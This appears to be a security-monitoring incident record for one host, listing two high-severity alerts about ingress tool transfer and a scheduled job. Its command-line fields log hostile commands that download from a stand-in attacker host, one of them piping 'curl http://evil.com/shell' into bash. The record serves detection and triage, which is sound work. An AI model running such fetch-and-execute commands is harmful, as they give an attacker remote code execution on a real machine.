Incident Overview

Incident ID: CINC-20251220-F7B896D6
Severity: Medium (70)
Status: new
Alert Count: 2
Host Count: 1

Timeline

First Seen: 2025-12-13 20:39:04
Last Seen: 2025-12-13 20:39:04
Duration: 0d 0h 0m
Created: 2025-12-20 13:23
Updated: 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Command and Control, Execution
Techniques: Ingress Tool Transfer, Scheduled Task/Job

Affected Hosts (1)

localhost.localdomain

Related Alerts (2)

Severity: High
Status: new
Hostname: localhost.localdomain
Description: An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
Tactic: Command and Control
Command Line: /bin/sh -c curl http://evil.com/shell|bash
Time: 12-13 20:39

Severity: High
Status: new
Hostname: localhost.localdomain
Description: A scheduled task/job has been executed on your host. This could be used by an attacker to execute programs at system startup, or on a scheduled basis for persistence. Please check the process tree to determine if executed commands are malicious or if this was expected behavior.
Tactic: Execution
Command Line: curl http://evil.com/shell
Time: 12-13 20:39